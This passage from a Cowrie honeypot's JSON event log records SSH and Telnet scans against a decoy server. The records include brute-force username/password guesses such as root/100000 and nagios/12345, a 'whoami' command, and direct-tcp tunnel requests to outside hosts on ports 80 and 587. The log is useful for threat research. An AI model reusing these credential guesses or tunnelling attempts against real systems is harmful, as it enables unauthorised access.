6","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T12:44:17.733248Z","src_ip":"186.225.142.90","session":"fc94f28e611d"}
{"eventid":"cowrie.login.success","username":"root","password":"100000","message":"login attempt [root/100000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:44:19.486732Z","src_ip":"186.225.142.90","session":"fc94f28e611d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T12:44:19.998027Z","src_ip":"186.225.142.90","session":"fc94f28e611d"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T12:44:19.998787Z","src_ip":"186.225.142.90","session":"fc94f28e611d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:44:20.258628Z","src_ip":"186.225.142.90","session":"fc94f28e611d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:44:20.319062Z","src_ip":"186.225.142.90","session":"fc94f28e611d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41266,"dst_ip":"1.2.3.4","dst_port":22,"session":"aca08fcc1398","protocol":"ssh","message":"New connection: 212.227.125.160:41266 (1.2.3.4:22) [session: aca08fcc1398]","sensor":"my-vps","timestamp":"2025-08-28T12:44:28.150162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:44:28.288736Z","src_ip":"212.227.125.160","session":"aca08fcc1398"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:44:28.369081Z","src_ip":"212.227.125.160","session":"aca08fcc1398"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"12345","message":"login attempt [nagios/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T12:44:29.210870Z","src_ip":"212.227.125.160","session":"aca08fcc1398"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:44:30.479743Z","src_ip":"212.227.125.160","session":"aca08fcc1398"}
{"eventid":"cowrie.session.connect","src_ip":"119.200.73.63","src_port":52975,"dst_ip":"1.2.3.4","dst_port":23,"session":"e48362a471ce","protocol":"telnet","message":"New connection: 119.200.73.63:52975 (1.2.3.4:23) [session: e48362a471ce]","sensor":"my-vps","timestamp":"2025-08-28T12:44:45.575210Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37244,"dst_ip":"1.2.3.4","dst_port":22,"session":"66d83c5f2061","protocol":"ssh","message":"New connection: 212.227.125.160:37244 (1.2.3.4:22) [session: 66d83c5f2061]","sensor":"my-vps","timestamp":"2025-08-28T12:45:08.875434Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:45:08.876551Z","src_ip":"212.227.125.160","session":"66d83c5f2061"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37539,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c5b9ec41944","protocol":"ssh","message":"New connection: 212.227.125.160:37539 (1.2.3.4:22) [session: 9c5b9ec41944]","sensor":"my-vps","timestamp":"2025-08-28T12:45:08.988259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:45:08.989120Z","src_ip":"212.227.125.160","session":"9c5b9ec41944"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T12:45:09.102772Z","src_ip":"212.227.125.160","session":"9c5b9ec41944"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54988,"dst_ip":"1.2.3.4","dst_port":22,"session":"bca8916e34a3","protocol":"ssh","message":"New connection: 212.227.125.160:54988 (1.2.3.4:22) [session: bca8916e34a3]","sensor":"my-vps","timestamp":"2025-08-28T12:45:09.428416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:45:09.429128Z","src_ip":"212.227.125.160","session":"bca8916e34a3"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:45:09.443983Z","src_ip":"212.227.125.160","session":"9c5b9ec41944"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T12:45:09.558090Z","session":"9c5b9ec41944"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:45:09.604620Z","src_ip":"212.227.125.160","session":"bca8916e34a3"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"12345678","message":"login attempt [nagios/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T12:45:10.123407Z","src_ip":"212.227.125.160","session":"bca8916e34a3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:45:11.398719Z","src_ip":"212.227.125.160","session":"bca8916e34a3"}
{"eventid":"cowrie.session.closed","duration":30.376495838165283,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:45:15.951622Z","src_ip":"119.200.73.63","session":"e48362a471ce"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54750,"dst_ip":"1.2.3.4","dst_port":22,"session":"84c793797852","protocol":"ssh","message":"New connection: 217.72.205.35:54750 (1.2.3.4:22) [session: 84c793797852]","sensor":"my-vps","timestamp":"2025-08-28T12:45:16.677260Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:45:16.678801Z","src_ip":"217.72.205.35","session":"84c793797852"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":35898,"dst_ip":"1.2.3.4","dst_port":22,"session":"9220ab9c7f7a","protocol":"ssh","message":"New connection: 80.94.95.15:35898 (1.2.3.4:22) [session: 9220ab9c7f7a]","sensor":"my-vps","timestamp":"2025-08-28T12:45:24.043546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:45:24.044649Z","src_ip":"80.94.95.15","session":"9220ab9c7f7a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:45:24.096257Z","src_ip":"80.94.95.15","session":"9220ab9c7f7a"}
{"eventid":"cowrie.login.success","username":"root","password":"pgj-heu05HQM=bMvz","message":"login attempt [root/pgj-heu05HQM=bMvz] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:45:24.393379Z","src_ip":"80.94.95.15","session":"9220ab9c7f7a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"80.94.95.15","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T12:45:24.445258Z","session":"9220ab9c7f7a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T12:45:24.496558Z","src_ip":"80.94.95.15","session":"9220ab9c7f7a"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:45:24.550529Z","src_ip":"80.94.95.15","session":"9220ab9c7f7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43526,"dst_ip":"1.2.3.4","dst_port":22,"session":"f35288359552","protocol":"ssh","message":"New connection: 212.227.125.160:43526 (1.2.3.4:22) [session: f35288359552]","sensor":"my-vps","timestamp":"2025-08-28T12:45:24.580660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:45:24.581411Z","src_ip":"212.227.125.160","session":"f35288359552"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T12:45:24.638894Z","src_ip":"212.227.125.160","session":"f35288359552"}
{"eventid":"cowrie.login.failed","username":"pfsense","password":"pfsense","message":"login attempt [pfsense/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-28T12:45:24.757036Z","src_ip":"212.227.125.160","session":"f35288359552"}
{"eventid":"cowrie.session.connect","src_ip":"157.0.0.10","src_port":54484,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f243ee11d06","protocol":"telnet","message":"New connection: 157.0.0.10:54484 (1.2.3.4:23) [session: 0f243ee11d06]","sensor":"my-vps","timestamp":"2025-08-28T12:45:24.782652Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:45:25.814881Z","src_ip":"212.227.125.160","session":"f35288359552"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ab252fc5b2b","protocol":"ssh","message":"New connection: 212.227.235.229:6103 (1.2.3.4:22) [session: 9ab252fc5b2b]","sensor":"my-vps","timestamp":"2025-08-28T12:45:28.193943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T12:45:28.557924Z","src_ip":"212.227.235.229","session":"9ab252fc5b2b"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T12:45:28.953063Z","src_ip":"212.227.235.229","session":"9ab252fc5b2b"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T12:45:29.345607Z","src_ip":"212.227.235.229","session":"9ab252fc5b2b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:45:29.347420Z","src_ip":"212.227.235.229","session":"9ab252fc5b2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53156,"dst_ip":"1.2.3.4","dst_port":22,"session":"102fe97af804","protocol":"ssh","message":"New connection: 212.227.125.160:53156 (1.2.3.4:22) [session: 102fe97af804]","sensor":"my-vps","timestamp":"2025-08-28T12:45:50.457034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:45:50.458137Z","src_ip":"212.227.125.160","session":"102fe97af804"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:45:50.628555Z","src_ip":"212.227.125.160","session":"102fe97af804"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"qwerty","message":"login attempt [nagios/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T12:45:51.135725Z","src_ip":"212.227.125.160","session":"102fe97af804"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:45:52.314323Z","src_ip":"212.227.125.160","session":"102fe97af804"}
{"eventid":"cowrie.session.closed","duration":30.69029688835144,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:45:55.472883Z","src_ip":"157.0.0.10","session":"0f243ee11d06"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:46:18.987618Z","src_ip":"212.227.125.160","session":"9c5b9ec41944"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35656,"dst_ip":"1.2.3.4","dst_port":22,"session":"accc487f1564","protocol":"ssh","message":"New connection: 212.227.125.160:35656 (1.2.3.4:22) [session: accc487f1564]","sensor":"my-vps","timestamp":"2025-08-28T12:46:32.028177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:46:32.029032Z","src_ip":"212.227.125.160","session":"accc487f1564"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2